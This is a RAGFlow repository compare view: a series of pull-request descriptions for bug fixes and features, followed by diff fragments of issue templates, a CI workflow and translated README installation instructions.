Add CSV file parsing support #4552, #5849, #5870
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Alter Item to TransferListItemType #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Why can't Retrieval component support internet web search. #5973
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
For an Agent with an Input Begin value, on the first call the return
session_id does not exist in the session
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
When creating and updating chats, add a check for the parsing status of
knowledge base documents. Ensure that all documents have been parsed
before allowing chat creation to improve user experience and system
stability.
**Main Changes:**
- Add document parsing status check logic in `chat.py`.
- Implement the `is_parsed_done` method in `knowledgebase_service.py`.
- Prevent chat creation when documents are being parsed or parsing has
failed.
### What problem does this PR solve?
Fix this bug: https://github.com/infiniflow/ragflow/issues/5960
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
This commit refactors the deep research module (deep_research.py), with
the following major improvements: The complex thinking and retrieval
logic has been broken down into multiple independent private methods,
enhancing code readability and maintainability. Static methods and class
methods have been introduced to simplify the logic for tag processing.
The search and reasoning processes have been optimized, increasing the
modularity of the code. The flexibility of information retrieval and
processing has been improved. The refactored code structure is now
clearer, making it easier to understand and extend the functionality of
the deep research module.
### What problem does this PR solve?
increase the modularity of the code
### Type of change
- [x] Refactoring
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
Fixes #5923
Rejects modification of read-only fields in the payload sent to
/datasets/<dataset_id>.
Now, if a user tries to modify read-only values, the API returns "The
input parameters are invalid."
invalid_keys = {"id", "embd_id", "chunk_num", "doc_num", "parser_id",
"create_date", "create_time", "created_by",
"status","token_num","update_date","update_time"}
if any(key in req for key in invalid_keys):
return get_error_data_result(message="The input parameters are invalid.")
The read-only keys are included in invalid_keys.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Raghav <2020csb1115@iitrpr.ac.in>
### What problem does this PR solve?
Fix: signal.SIGUSR1 and signal.SIGUSR2 are not available on Windows, so
do not bind them in a Windows environment.
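One portable way to express this guard is to bind only the signals that the platform's `signal` module actually defines. This is a sketch; the PR may instead check the platform name, and `bind_user_signals` is a hypothetical helper.

```python
import signal


def bind_user_signals(handler):
    """Bind SIGUSR1/SIGUSR2 only where the platform defines them; return bound names."""
    bound = []
    for name in ("SIGUSR1", "SIGUSR2"):
        signum = getattr(signal, name, None)  # these attributes are absent on Windows
        if signum is not None:
            signal.signal(signum, handler)
            bound.append(name)
    return bound
```

On Windows the function binds nothing and returns an empty list instead of raising AttributeError at startup.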
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: tangyu <1@1.com>
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: renqi <renqi08266@fxomail.com>
### What problem does this PR solve?
Feat: Add Breadcrumb component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add support for the German language.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixed #5839
This PR fixes error code 102, which states that dataset_ids is required.
curl --request POST \
--url http://{address}/api/v1/chats \
--header 'Content-Type: application/json' \
--header 'Authorization: Bearer <YOUR_API_KEY>' \
--data '{
"name": "test_chat"
}'
This request does not send dataset_ids; this PR fixes that.
File location: sdk\python\ragflow_sdk\ragflow.py
Added: "dataset_ids": dataset_list if dataset_list else [],
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Raghav <2020csb1115@iitrpr.ac.in>
### What problem does this PR solve?
Feat: Add AvatarGroup component. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
**Update generate.py:**
Issue: Some model providers strictly validate the format of the input
conversation and require that the role of the first message is not
assistant; otherwise, an error occurs.
Solution: Removed the system-set agent opening statement so that the
first message in the conversation passed to the model never has the
assistant role.
**Update retrieval.py:**
Issue: Knowledge base retrieval currently uses the entire conversation
as input, which may lead to inaccurate retrieval results.
Solution: Changed the retrieval logic to use only the user's last
question for knowledge base retrieval, improving retrieval accuracy.
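Both changes can be illustrated on a plain list of chat messages. The helper names and the message shape (`role`/`content` dicts) are assumptions made for this sketch, not the code in generate.py or retrieval.py.

```python
def drop_leading_assistant(messages):
    """Skip leading assistant messages so the first entry is not role=assistant."""
    start = 0
    while start < len(messages) and messages[start]["role"] == "assistant":
        start += 1
    return messages[start:]


def last_user_question(messages):
    """Return the content of the most recent user message, or an empty string."""
    for message in reversed(messages):
        if message["role"] == "user":
            return message["content"]
    return ""


history = [
    {"role": "assistant", "content": "Hi! How can I help?"},  # agent opening statement
    {"role": "user", "content": "What is RAG?"},
    {"role": "assistant", "content": "Retrieval-augmented generation."},
    {"role": "user", "content": "How do I tune chunk size?"},
]
print(drop_leading_assistant(history)[0]["role"])
print(last_user_question(history))
```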
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Performance Improvement
When accessing the /api/v1/agents/{agent_id}/completions API, sessions
created before agent modifications retain the old DSL data. To use the
latest agent configuration (like new prompts) in historical sessions, I
added the sync_dsl parameter. It defaults to False to maintain existing
behavior and only synchronizes when set to True. If needed, a manual
synchronization API can be created to trigger the sync explicitly.
### What problem does this PR solve?
Fix: keyword component display issue #5794
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: When selecting a rerank model, show a prompt warning that it may
take a long time. #5834
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add TransferList component. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The `/api/v1/chats` API endpoint was broken: any GET request got the
following response:
```
{"code":100,"data":null,"message":"TypeError(\"'int' object is not callable\")"}
```
With this log on the ragflow-server side:
```
2025-03-07 14:36:26,297 ERROR 20 'int' object is not callable
Traceback (most recent call last):
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
rv = self.dispatch_request()
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
File "/ragflow/api/utils/api_utils.py", line 303, in decorated_function
return func(*args, **kwargs)
File "/ragflow/api/apps/sdk/chat.py", line 323, in list_chat
logging.WARN(f"Don't exist the kb {kb_id}")
TypeError: 'int' object is not callable
2025-03-07 14:36:26,298 INFO 20 172.18.0.6 - - [07/Mar/2025 14:36:26] "GET /api/v1/chats HTTP/1.1" 200 -
```
This was caused by calling `logging.WARN` as if it were a function (it is
an integer log-level constant) instead of the correct `logging.warning()`
function. This PR fixes that, and also rewrites the message to be
grammatically correct.
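The failure can be reproduced in isolation with the standard library. In this sketch the `kb_id` value and the wording of the corrected message are hypothetical; only the `logging.WARN` versus `logging.warning()` distinction comes from the description above.

```python
import logging

kb_id = "kb-123"  # hypothetical knowledge base ID

# logging.WARN is an integer level constant, not a function.
print(type(logging.WARN), logging.WARN == logging.WARNING)

try:
    logging.WARN(f"Don't exist the kb {kb_id}")  # the original, broken call
except TypeError as exc:
    error_message = str(exc)
    print(error_message)

# The fix: call the logging function (message wording is illustrative).
logging.warning("The kb %s does not exist", kb_id)
```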
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The vLLM provider does not work with a reranking model. Under the hood,
vLLM uses the [CoHereRerank
provider](https://github.com/infiniflow/ragflow/blob/v0.17.0/rag/llm/__init__.py#L250)
with a `base_url`. If this URL [is not passed to the Cohere
client](https://github.com/infiniflow/ragflow/blob/v0.17.0/rag/llm/rerank_model.py#L379-L382),
every request ends up on the Cohere SaaS (sending your private API key
in the process) instead of your vLLM instance.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix: when starting from source code on Windows (not in the Docker
environment), the following error is reported: "UnicodeDecodeError: 'gbk'
codec can't decode byte 0xad in position 5: illegal multibyte sequence".
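This class of error typically appears when a UTF-8 file is opened in text mode without an explicit encoding, so Python falls back to the locale default (GBK on many Chinese-locale Windows systems). The sketch below reproduces it on any platform by forcing `encoding="gbk"`; the file content is made up for illustration and is not taken from the affected code.

```python
import os
import tempfile

text = "name: 中\n"  # illustrative content; any non-ASCII UTF-8 text can trigger this

with tempfile.NamedTemporaryFile("wb", suffix=".yaml", delete=False) as tmp:
    tmp.write(text.encode("utf-8"))
    path = tmp.name

# Simulate the Windows default: decode the UTF-8 bytes as GBK.
try:
    with open(path, encoding="gbk") as f:
        f.read()
    gbk_failed = False
except UnicodeDecodeError as exc:
    gbk_failed = True
    print(exc)

# Passing the encoding explicitly makes the read locale-independent.
with open(path, encoding="utf-8") as f:
    content = f.read()

os.remove(path)
print(repr(content))
```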
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: tangyu <1@1.com>
### What problem does this PR solve?
Fixed the issue of "stop deleting when encountering invalid dataset ID"
#5760
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Optimize the table extraction logic in the Markdown parser:
Enhance the recognition of both borderless and bordered Markdown tables.
Add support for extracting HTML tables, including various scenarios with
nested HTML tags.
Improve performance by using conditional checks to reduce unnecessary
regular expression matching.
### Type of change
- [x] Performance Improvement
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
1. **Issue**: When calling `list_agent_session` via the HTTP API, users
may only need to display conversation messages and may not want to see
the associated DSL, which can be very large. Therefore, consider adding
a control option to determine whether the DSL should be returned, with
the default being to return it.
2. **Documentation Discrepancy**: In the HTTP API documentation, under
"List agent sessions," the "Response" section states that the "data"
field is a dictionary when "success" is returned. However, the actual
returned data is a list. This discrepancy has been corrected.
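One way to picture the control option from item 1 is a serializer that drops the `dsl` key on request. This is only a sketch: the flag name `include_dsl` and the session shape are hypothetical, not the actual API.

```python
def serialize_sessions(sessions, include_dsl=True):
    """Return a list of session dicts, optionally without the large `dsl` field.

    `include_dsl` is a hypothetical flag name; it defaults to True so that
    the DSL is returned unless the caller opts out.
    """
    if include_dsl:
        return [dict(session) for session in sessions]
    return [{k: v for k, v in session.items() if k != "dsl"} for session in sessions]


# Made-up session data for illustration.
sessions = [{"id": "s1", "messages": [{"role": "user", "content": "hi"}], "dsl": {"graph": {}}}]
print(serialize_sessions(sessions, include_dsl=False))
```

Note that the result is a list, which matches the corrected documentation in item 2.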
### What problem does this PR solve?
Fix: Fixed the issue that files cannot be uploaded on the file
management page. #5730
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
The `dialog_id` field was inconsistently defined:
- In the `migrate_db()` function, it was set to `null=True`.
- In the model class, it was defined as `null=False`.
This inconsistency caused an issue during the initial deployment where
the database table did not allow `dialog_id` to be null. As a result,
calling `APITokenService.save(**obj)` in `system_app.py` raised the
following error:
```
peewee.IntegrityError: null value in column "dialog_id" violates not-null constraint
```
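The effect of the mismatch can be illustrated with the standard-library `sqlite3` module instead of peewee. This is an analogy under stated assumptions: the table names are made up, and the real deployment uses a different database, but a NOT NULL column rejects a missing `dialog_id` in the same way.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Table created with a NOT NULL column, as on the initial deployment.
conn.execute("CREATE TABLE strict_token (token TEXT, dialog_id TEXT NOT NULL)")
# Table created with a nullable column, as in the migration.
conn.execute("CREATE TABLE nullable_token (token TEXT, dialog_id TEXT)")

try:
    conn.execute("INSERT INTO strict_token (token, dialog_id) VALUES (?, ?)", ("t1", None))
    strict_ok = True
except sqlite3.IntegrityError as exc:
    strict_ok = False
    print(exc)

conn.execute("INSERT INTO nullable_token (token, dialog_id) VALUES (?, ?)", ("t1", None))
nullable_rows = conn.execute("SELECT COUNT(*) FROM nullable_token").fetchone()[0]
conn.close()
print(strict_ok, nullable_rows)
```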
### What problem does this PR solve?
Error: peewee.IntegrityError: null value in column "dialog_id" violates
not-null constraint
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Close #5730
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Signed-off-by: yihong0618 <zouzou0208@gmail.com>
### What problem does this PR solve?
Fix: Remove the document language parameter. #5686
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Remove the max token parameter. #5640 #5646
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add rerank option to huggingface's model type drop-down box. #5658
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Use react-hook-form to synchronize the data of the categorize form
to the agent node. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the Document parser option when the parsing method is
Paper. #5467
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Refactored DocumentService.update_progress
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The `ocr.res` file is already included in the model directory
`rag/res/deepdoc`, but it doesn't seem to be utilized here.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
close issue #5600
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: yihong0618 <zouzou0208@gmail.com>
### What problem does this PR solve?
### Type of change
- [x] Performance Improvement
---------
Co-authored-by: wangwei <dwxiayi@163.com>
### What problem does this PR solve?
Fix the issue where, when getting a user's APIToken, if the user is part
of another user's team, it incorrectly gets the Team owner's APIToken
instead.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Render DynamicCategorize with shadcn-ui. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render MessageForm with shadcn-ui. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
As the title says: export PYTHONPATH in the shell.
### Type of change
- [x] Refactoring
Signed-off-by: yihong0618 <zouzou0208@gmail.com>
### What problem does this PR solve?
Introduced jemalloc.
Python uses pymalloc (which is a reimplementation of glibc malloc) to
manage resident memory (RES). It keeps pools for small objects and avoids
returning memory to the OS aggressively. In my experience, replacing
pymalloc with [jemalloc](https://github.com/jemalloc/jemalloc) can reduce
RES and speed up task_executor.py.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Fix: part of the information in the last stream chunk could be lost.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Adds a new Kubernetes Service resource to the Helm chart that
specifically targets the RAGFlow API. This is useful when you want to
expose the RAGFlow HTTP API separately from the web interface. For
example, if RAGFlow is running behind an authenticating proxy, a separate
ingress resource can forward to the API-only k8s Service added here,
giving a route that bypasses the proxy for RAGFlow API access. This is
still secure, since API access is already authenticated by API keys
inside RAGFlow itself.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: LLM with ___ return cannot be deleted #5585
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Render WikipediaForm and BaiduForm with shadcn-ui. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The API doc is too long; adding a table of contents would make it easier to navigate.

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Render QWeatherForm with shadcn-ui. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add session deletion support for agents in the HTTP and Python APIs.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Render RewriteQuestionForm with shadcn-ui #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Combine Select and LlmSettingFieldItems into LLMSelect. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add NextLLMSelect with shadcn-ui. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This pull request aims to fix a bug that prevents certain email
addresses from signing up. The affected TLDs were returning 'invalid
email address' errors:
.museum
.software
.photography
.technology
.marketing
.education
.international
.community
.construction
.government
.consulting
....
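A common cause of this kind of rejection is a validation pattern that caps the TLD length. The two patterns below are hypothetical stand-ins (the actual expressions changed by this PR are not shown here); they only illustrate how relaxing the length limit accepts the longer TLDs listed above.

```python
import re

# Hypothetical "before" pattern: the TLD is limited to 2-4 letters.
RESTRICTIVE = re.compile(r"^[\w.-]+@(?:[\w-]+\.)+[A-Za-z]{2,4}$")
# Hypothetical "after" pattern: the TLD may be 2 or more letters.
RELAXED = re.compile(r"^[\w.-]+@(?:[\w-]+\.)+[A-Za-z]{2,}$")

# Made-up addresses using TLDs from the list above.
for address in ("curator@example.museum", "dev@example.software", "me@example.com"):
    print(address, bool(RESTRICTIVE.match(address)), bool(RELAXED.match(address)))
```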
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Close #5277 by making sure the file is closed.
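The usual way to guarantee that a file is closed in Python is a `with` block. This is a generic sketch of that pattern, not the code touched by this PR; the temporary file is created only for the demonstration.

```python
import os
import tempfile

fd, path = tempfile.mkstemp(suffix=".txt")
os.close(fd)

# The context manager closes the handle when the block exits,
# including when an exception is raised inside it.
try:
    with open(path, "w", encoding="utf-8") as handle:
        handle.write("chunk")
        raise RuntimeError("simulated failure while writing")
except RuntimeError:
    pass

closed_after_block = handle.closed
os.remove(path)
print(closed_after_block)
```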
### Type of change
- [x] Performance Improvement
---------
Signed-off-by: yihong0618 <zouzou0208@gmail.com>
2025-03-03 10:26:45 +08:00
2215 changed files with 236957 additions and 96275 deletions
description: Propose an agent scenario request for RAGFlow.
title: "[Agent Scenario Request]: "
labels: ["❤️🔥ᴬᴳᴱᴺᵀ agent scenario"]
body:
  - type: checkboxes
    attributes:
      label: Self Checks
      description: "Please check the following in order to be responded in time :)"
      options:
        - label: I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
          required: true
        - label: I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
          required: true
        - label: Non-English title submissions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
          required: true
        - label: "Please do not modify this template :) and fill in all the required fields."
          required: true
  - type: textarea
    attributes:
      label: Is your feature request related to a scenario?
      description: |
        A clear and concise description of what the scenario is. Ex. I'm always frustrated when [...]
      render: Markdown
    validations:
      required: false
  - type: textarea
    attributes:
      label: Describe the feature you'd like
      description: A clear and concise description of what you want to happen.
    validations:
      required: true
  - type: textarea
    attributes:
      label: Documentation, adoption, use case
      description: If you can, explain some scenarios how users might use this, situations it would be helpful in. Any API designs, mockups, or diagrams are also helpful.
      render: Markdown
    validations:
      required: false
  - type: textarea
    attributes:
      label: Additional information
      description: |
        Add any other context or screenshots about the feature request here.
label:Is there an existing issue for the same bug?
description:Please check if an issue already exists for the bug you encountered.
label:Self Checks
description:"Please check the following in order to be responded in time :)"
options:
- label:I have checked the existing issues.
required:true
- label:I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
required:true
- label:I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:"Please do not modify this template :) and fill in all the required fields."
required:true
- type:markdown
attributes:
value:"Please provide the following information to help us understand the issue."
description:Propose a feature request for RAGFlow.
title:"[Feature Request]: "
labels:[feature request]
labels:["💞 feature"]
body:
- type:checkboxes
attributes:
label:Is there an existing issue for the same feature request?
description:Please check if an issue already exists for the feature you request.
label:Self Checks
description:"Please check the following in order to be responded in time :)"
options:
- label:I have checked the existing issues.
- label:I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
required:true
- label:I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:"Please do not modify this template :) and fill in all the required fields."
description:"Please check the following in order to be responded in time :)"
options:
- label:I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
required:true
- label:I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:"Please do not modify this template :) and fill in all the required fields."
# Calculate the hash of the current workspace content
HEAD_SHA=$(git rev-parse HEAD^{tree})
if [[ "${HEAD_SHA}" == "${PR_SHA}" ]]; then
echo "Cancel myself since the workspace content hash is the same with PR #${PR_NUMBER} merged. See ${GITHUB_SERVER_URL}/${GITHUB_REPOSITORY}/actions/runs/${PR_RUN_ID} for details."
gh run cancel ${GITHUB_RUN_ID}
while true; do
status=$(gh run view ${GITHUB_RUN_ID} --json status -q .status)
[ "${status}" = "completed" ] && break
sleep 5
done
exit 1
fi
fi
fi
elif [[ ${GITHUB_EVENT_NAME} == "pull_request" ]]; then
if:always() # always run this step even if previous steps failed
run:|
sudo DOC_ENGINE=infinity docker compose -f docker/docker-compose.yml down -v
# Sometimes `docker compose down` fail due to hang container, heavy load etc. Need to remove such containers to release resources(for example, listen ports).
| tar -xf - --strip-components=2 -C /root/.ragflow)\
fi
# https://github.com/chrismattmann/tika-python
# This is the only way to run python-tika without internet access. Without this set, the default is to check the tika version and pull latest every time from Apache.
- 🔧 [Build a docker image without embedding models](#-build-a-docker-image-without-embedding-models)
- 🔧 [Build a docker image including embedding models](#-build-a-docker-image-including-embedding-models)
- 🔧 [Build a Docker image](#-build-a-docker-image)
- 🔨 [Launch service from source for development](#-launch-service-from-source-for-development)
- 📚 [Documentation](#-documentation)
- 📜 [Roadmap](#-roadmap)
@ -62,29 +72,28 @@
## 💡 What is RAGFlow?
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document
understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models)
to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted
data.
[RAGFlow](https://ragflow.io/) is a leading open-source Retrieval-Augmented Generation (RAG) engine that fuses cutting-edge RAG with Agent capabilities to create a superior context layer for LLMs. It offers a streamlined RAG workflow adaptable to enterprises of any scale. Powered by a converged context engine and pre-built agent templates, RAGFlow enables developers to transform complex data into high-fidelity, production-ready AI systems with exceptional efficiency and precision.
## 🎮 Demo
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
> If you have not installed Docker on your local machine (Windows, Mac, or Linux),
> see [Install Docker Engine](https://docs.docker.com/engine/install/).
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you intend to use the code executor (sandbox) feature of RAGFlow.
> [!TIP]
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
3. Start up the server using the pre-built Docker images:
> The command below downloads the `v0.17.0-slim` edition of the RAGFlow Docker image. Refer to the following table for descriptions of different RAGFlow editions. To download a RAGFlow edition different from `v0.17.0-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example: set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.17.0` for the full edition `v0.17.0`.
> [!CAUTION]
> All Docker images are built for x86 platforms. We don't currently offer Docker images for ARM64.
> If you are on an ARM64 platform, follow [this guide](https://ragflow.io/docs/dev/build_docker_image) to build a Docker image compatible with your system.
> The command below downloads the `v0.22.1` edition of the RAGFlow Docker image. See the following table for descriptions of different RAGFlow editions. To download a RAGFlow edition different from `v0.22.1`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server.
```bash
$ cd ragflow/docker
$ docker compose -f docker-compose.yml up -d
```
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
- 🔨 [Launch the application from source for development](#-meluncurkan-aplikasi-dari-sumber-untuk-pengembangan)
- 📚 [Documentation](#-dokumentasi)
- 📜 [Roadmap](#-peta-jalan)
@ -62,25 +72,29 @@
## 💡 What is RAGFlow?
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. The platform provides an efficient RAG workflow for businesses of various scales, combining LLMs (Large Language Models) to provide truthful question-answering capabilities backed by references from complex structured data.
[RAGFlow](https://ragflow.io/) is a leading open-source RAG (Retrieval-Augmented Generation) engine that integrates cutting-edge RAG technology with Agent capabilities to create a superior context layer for LLMs. It provides an efficient RAG workflow that can be adapted to enterprises of any scale. Powered by a converged context engine and pre-built Agent templates, RAGFlow enables developers to transform complex data into high-fidelity, production-ready AI systems with exceptional efficiency and precision.
## 🎮 Demo
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
@ -133,6 +147,10 @@ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you intend to use the code executor (sandbox) feature of RAGFlow.
> [!TIP]
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Start up the server
@ -157,33 +175,48 @@ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
3. Start the server using the pre-built Docker image:
> The command below downloads the v0.17.0-slim edition of the RAGFlow Docker image. See the following table for descriptions of the different RAGFlow editions. To download a RAGFlow edition different from v0.17.0-slim, update the RAGFLOW_IMAGE variable in docker/.env before using docker compose to start the server. For example, set RAGFLOW_IMAGE=infiniflow/ragflow:v0.17.0 for the full edition v0.17.0.
> [!CAUTION]
> All Docker images are built for x86 platforms. We don't currently offer Docker images for ARM64.
> If you are on an ARM64 platform, [follow this guide to build a Docker image compatible with your system](https://ragflow.io/docs/dev/build_docker_image).
> The command below downloads the v0.22.1 edition of the RAGFlow Docker image. See the following table for descriptions of the different RAGFlow editions. To download a RAGFlow edition different from v0.22.1, update the RAGFLOW_IMAGE variable in docker/.env before using docker compose to start the server.
```bash
$ cd ragflow/docker
# git checkout v0.22.1
# Optional: use a stable tag (see releases: https://github.com/infiniflow/ragflow/releases)
# This step ensures the **entrypoint.sh** file in the code matches the Docker image version.
# Use CPU for DeepDoc tasks:
$ docker compose -f docker-compose.yml up -d
```
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. Combined with large language models (LLMs), it provides accurate question-answering capabilities, backed by citations grounded in reliable sources from data in various complex formats. RAGFlow offers an optimized RAG workflow for businesses of any scale.
[RAGFlow](https://ragflow.io/) is a leading open-source RAG engine that fuses cutting-edge RAG (Retrieval-Augmented Generation) with Agent capabilities to create a superior context layer for large language models (LLMs). It offers an efficient RAG workflow applicable to enterprises of any scale. Through a converged context engine and pre-built Agent templates, it enables developers to transform complex data into high-fidelity, production-ready AI systems with exceptional efficiency and precision.
> If Docker is not installed on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you intend to use the code executor (sandbox) feature of RAGFlow.
> [!TIP]
> If Docker is not installed on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Start up the server
@ -147,24 +165,40 @@
3. Start the server using the pre-built Docker image:
> The command below downloads the v0.17.0-slim edition of the RAGFlow Docker image. See the following table for descriptions of the different RAGFlow editions. To download a RAGFlow edition different from v0.17.0-slim, update the RAGFLOW_IMAGE variable accordingly in docker/.env before using docker compose to start the server. For example, to download the full edition v0.17.0, set RAGFLOW_IMAGE=infiniflow/ragflow:v0.17.0.
> [!CAUTION]
> All Docker images are built for x86 platforms. We don't currently offer Docker images for ARM64.
> If you are on an ARM64 platform, [follow this guide to build a Docker image compatible with your system](https://ragflow.io/docs/dev/build_docker_image).
> The command below downloads the v0.22.1 edition of the RAGFlow Docker image. See the following table for descriptions of the different RAGFlow editions. To download a RAGFlow edition different from v0.22.1, update the RAGFLOW_IMAGE variable accordingly in docker/.env before using docker compose to start the server.
```bash
$ cd ragflow/docker
# git checkout v0.22.1
# Optional: use a stable tag (see releases: https://github.com/infiniflow/ragflow/releases)
# This step ensures the entrypoint.sh file in the code matches the Docker image version.
# Use CPU for DeepDoc tasks:
$ docker compose -f docker-compose.yml up -d
```
